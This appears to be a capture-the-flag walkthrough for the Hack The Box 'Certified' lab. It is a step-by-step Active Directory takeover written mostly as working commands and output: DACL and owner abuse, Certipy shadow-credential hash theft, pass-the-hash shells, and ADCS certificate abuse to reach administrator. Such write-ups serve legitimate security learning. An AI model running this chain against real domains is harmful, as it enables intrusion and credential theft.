# Certified ### Certified HTB Walkthrough ### Initial Nmap Scan ```bash nmap -p- -sVC 10.129.231.186 ``` **Notable Ports and Services:** * 53 (DNS) * 88 (Kerberos) * 389/636/3268/3269 (LDAP) * 135, 139, 445 (SMB, NetBIOS) * 5985 (WinRM) * 9389 (.NET Message Framing) * Various high RPC ports ### SMB Authentication Attempt ```bash nxc smb certified.htb -u judith.mader -p judith09 ``` **Result:** * Successful login: `certified.htb\judith.mader` ### Enumerating Shares (First Attempt Fails) ```bash nxc smb DC01.certified.htb --shares ``` **Result:** * STATUS\_USER\_SESSION\_DELETED ### WinRM Login Attempt ```bash nxc winrm certified.htb -u judith.mader -p judith09 ``` **Result:** * Login failed ### Enumerating Shares (Successful) ```bash nxc smb DC01.certified.htb -u judith.mader -p judith09 --shares ``` **Result:** * ADMIN$ * C$ * IPC$ * NETLOGON * SYSVOL ### BloodHound
### Owner SID Modification ```bash owneredit.py -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186 ``` **Result:** * OwnerSid of Domain Admins modified successfully ### DACL Permission Injection ```bash dacledit.py -action 'write' -rights 'WriteMembers' -principal judith.mader -target management "certified.htb"/"judith.mader":"judith09" ``` **Result:** * DACL modified successfully ### Add User to Group ```bash net rpc group addmem management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186 ``` **Result:** * Successfully added ### Shadow Credentials Attack with Certipy (1st Attempt Fail) ```bash certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.129.231.186 ``` **Result:** * Clock skew error ### Shadow Credentials Attack with Correct Time Sync ```bash sudo ntpdate 10.129.166.118 certipy shadow auto -target certified.htb -dc-ip 10.129.68.9 -username judith.mader@certified.htb -password judith09 -account management_svc ``` **Result:** * NT hash for management\_svc retrieved: `a091c1832bcdd4677c28b5a6a1295584` ### Confirm Access with NT Hash ```bash nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 ``` ### Enumerate Shares and Users ```bash nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --shares nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --users ``` ### Confirm WinRM Access ```bash nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 ``` ### Evil-WinRM Shell Access ```bash evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 ``` ### Identify ADCS Server ```bash nxc ldap certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 -M adcs ``` ### Shadow Credentials on ca\_operator ```bash certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.166.118 ``` **Result:** * NT hash retrieved: `b4b86f45c6018f1b664f70805f45d8f2` ### Modify UPN to Administrator ```bash certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator ``` ### Request Certificate with Administrator UPN ```bash certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -debug ``` **Result:** * Certificate issued with UPN: `administrator` * Saved as `administrator.pfx` ### Authenticate as Administrator with Certificate ```bash certipy auth -pfx administrator.pfx -domain certified.htb ``` **Result:** * NT hash retrieved: `aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34`